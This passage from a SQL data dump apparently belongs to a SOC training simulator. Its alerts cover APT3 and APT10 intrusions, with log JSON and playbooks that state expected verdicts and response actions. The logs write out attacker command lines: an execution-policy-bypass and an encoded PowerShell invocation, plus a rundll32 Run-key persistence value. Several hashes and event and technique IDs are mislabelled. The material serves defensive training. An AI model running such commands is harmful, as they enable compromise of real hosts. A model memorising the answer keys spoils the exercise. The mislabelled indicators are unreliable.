'{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with APT3 command and control servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"IP address of targeted employee within the network.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"john.doe@fakecompany.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Source Intelligence\",\"verdict\":\"malicious\",\"details\":\"Email address used in a known spear phishing campaign by APT3.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with a malicious document used in phishing 
attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Email Detected\",\"date\":\"2026-02-01T20:32:18.980Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(385, 'Malicious PowerShell Script Execution', 'high', 'Endpoint Detection and Response (EDR)', 'APT3 executed a PowerShell script on a compromised system to deploy additional payloads, aiming to maintain a stealthy presence and further infiltrate the network.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"4624\",\"computer_name\":\"compromised-host-01\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.24\",\"internal_ip\":\"10.0.1.15\",\"script_name\":\"Invoke-MaliciousScript.ps1\",\"script_hash\":\"3e2f5d9b7a6f4c5e8a8e7b2f6d1a9c3e\",\"process_id\":\"4567\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\Invoke-MaliciousScript.ps1\",\"parent_process\":\"explorer.exe\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\Invoke-MaliciousScript.ps1\"}', '2026-01-04 02:06:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.24\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT3\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Compromised internal host\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Invoke-MaliciousScript.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR\",\"verdict\":\"malicious\",\"details\":\"PowerShell script used by APT3\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3e2f5d9b7a6f4c5e8a8e7b2f6d1a9c3e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known APT3 payload\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(386, 'Establishing Persistence via Registry Modification', 'high', 'Windows Registry Logs', 'To ensure continued access to the infected system, APT3 modifies registry settings. This registry modification allows their malware to persist even after system reboots.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:24:17Z\",\"event_id\":4657,\"event_type\":\"Registry Modification\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.102\",\"user\":\"SYSTEM\",\"registry_path\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"modified_value_name\":\"APT3PersistentService\",\"modified_value_data\":\"C:\\\\Windows\\\\System32\\\\rundll32.exe C:\\\\Temp\\\\malicious.dll,EntryPoint\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"malicious.dll\"}', '2026-01-04 02:06:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT3 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known APT3 malware sample.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security Vendor\",\"verdict\":\"malicious\",\"details\":\"DLL identified as APT3 persistence mechanism.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.983Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:17Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Modification\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.102\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value_name\\\":\\\"APT3PersistentService\\\",\\\"modified_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\Temp\\\\\\\\malicious.dll,EntryPoint\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.983Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:17Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Modification\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.102\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value_name\\\":\\\"APT3PersistentService\\\",\\\"modified_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe 
C:\\\\\\\\Temp\\\\\\\\malicious.dll,EntryPoint\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.983Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:17Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Modification\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.102\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value_name\\\":\\\"APT3PersistentService\\\",\\\"modified_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\Temp\\\\\\\\malicious.dll,EntryPoint\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.983Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:17Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Modification\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.102\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value_name\\\":\\\"APT3PersistentService\\\",\\\"modified_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\Temp\\\\\\\\malicious.dll,EntryPoint\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.983Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected 
[Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:17Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Modification\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.102\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"modified_value_name\\\":\\\"APT3PersistentService\\\",\\\"modified_value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\rundll32.exe C:\\\\\\\\Temp\\\\\\\\malicious.dll,EntryPoint\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious.dll\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(387, 'Lateral Movement through Credential Dumping', 'high', 'Network Traffic Analysis', 'APT3 has initiated lateral movement within the network by utilizing credential dumping techniques. The attacker has successfully accessed additional systems using stolen credentials, aiming to expand their reach within the network.', 'Lateral Movement', 'T1003 - Credential Dumping', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:32Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.45\",\"event_type\":\"credential_dumping\",\"username\":\"jdoe\",\"dumped_file\":\"NTDS.dit\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"lateral_movement_attempt\",\"protocol\":\"SMB\",\"network_segment\":\"internal\",\"alert_id\":\"alert_10234\"}', '2026-01-04 02:06:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalAssetDB\",\"verdict\":\"internal\",\"details\":\"Internal network address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"UserBehaviorAnalytics\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(388, 'Data Exfiltration via Encrypted Channels', 'high', 'Data Loss Prevention (DLP) Systems', 'In the final stage, APT3 attempts to exfiltrate sensitive data using encrypted channels, aiming to evade detection mechanisms. The operation was detected when unusual encrypted traffic was observed between internal host 192.168.1.45 and an external IP address 203.0.113.5. The malicious file \'encrypted_payload.zip\' with hash \'d41d8cd98f00b204e9800998ecf8427e\' was involved in the exfiltration attempt.', 'Exfiltration', 'T1048.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:00Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"protocol\":\"HTTPS\",\"file_name\":\"encrypted_payload.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"action\":\"exfiltration_attempt\",\"status\":\"blocked\"}', '2026-01-04 02:06:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host participating in exfiltration attempt.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"encrypted_payload.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"DLP Database\",\"verdict\":\"suspicious\",\"details\":\"File involved in suspected data exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by 
APT3.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.987Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"encrypted_payload.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"status\\\":\\\"blocked\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.987Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"encrypted_payload.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"status\\\":\\\"blocked\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.987Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"encrypted_payload.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"status\\\":\\\"blocked\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.987Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"encrypted_payload.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"status\\\":\\\"blocked\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.987Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"encrypted_payload.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"status\\\":\\\"blocked\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(389, 'Initial Access via Compromised MSP Credentials', 'high', 'Authentication Logs', 'APT10 exploits stolen credentials from a managed service provider to infiltrate the aerospace company\'s network, setting the stage for a prolonged espionage campaign. Anomalous login detected from an external IP address using compromised MSP credentials.', 'Credential Theft', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:45:00Z\",\"event_type\":\"authentication_attempt\",\"username\":\"msp_admin@aerospacecompany.com\",\"auth_status\":\"success\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"method\":\"password\",\"event_id\":\"auth-789654\",\"mfa_status\":\"not_required\"}', '2026-01-04 02:14:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"msp_admin@aerospacecompany.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Compromised managed service provider credentials.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known threat actor activities.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal aerospace company network IP.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John 
Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(390, 'Execution Using DLL Side-Loading', 'high', 'Application Logs', 'The threat actors employ DLL side-loading to execute their malicious code under the guise of trusted applications, evading traditional detection mechanisms.', 'Execution', 'T1073.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"4624\",\"application\":\"legitapp.exe\",\"loaded_dll\":\"msvcr110.dll\",\"original_dll_path\":\"C:\\\\Program Files\\\\LegitApp\\\\msvcr110.dll\",\"malicious_dll_path\":\"C:\\\\Temp\\\\msvcr110.dll\",\"executing_user\":\"jdoe\",\"source_ip\":\"192.168.1.45\",\"attacker_ip\":\"203.0.113.45\",\"hash_malicious_dll\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"malware_name\":\"APT10_SideLoad\"}', '2026-01-04 02:14:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"msvcr110.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as a malicious DLL used in side-loading attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT10_SideLoad malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known command and control server for APT10 operations.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate 
user account on the network.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.990Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"application\\\":\\\"legitapp.exe\\\",\\\"loaded_dll\\\":\\\"msvcr110.dll\\\",\\\"original_dll_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\LegitApp\\\\\\\\msvcr110.dll\\\",\\\"malicious_dll_path\\\":\\\"C:\\\\\\\\Temp\\\\\\\\msvcr110.dll\\\",\\\"executing_user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash_malicious_dll\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"malware_name\\\":\\\"APT10_SideLoad\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.990Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"application\\\":\\\"legitapp.exe\\\",\\\"loaded_dll\\\":\\\"msvcr110.dll\\\",\\\"original_dll_path\\\":\\\"C:\\\\\\\\Program 
Files\\\\\\\\LegitApp\\\\\\\\msvcr110.dll\\\",\\\"malicious_dll_path\\\":\\\"C:\\\\\\\\Temp\\\\\\\\msvcr110.dll\\\",\\\"executing_user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash_malicious_dll\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"malware_name\\\":\\\"APT10_SideLoad\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.990Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"application\\\":\\\"legitapp.exe\\\",\\\"loaded_dll\\\":\\\"msvcr110.dll\\\",\\\"original_dll_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\LegitApp\\\\\\\\msvcr110.dll\\\",\\\"malicious_dll_path\\\":\\\"C:\\\\\\\\Temp\\\\\\\\msvcr110.dll\\\",\\\"executing_user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash_malicious_dll\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"malware_name\\\":\\\"APT10_SideLoad\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.990Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 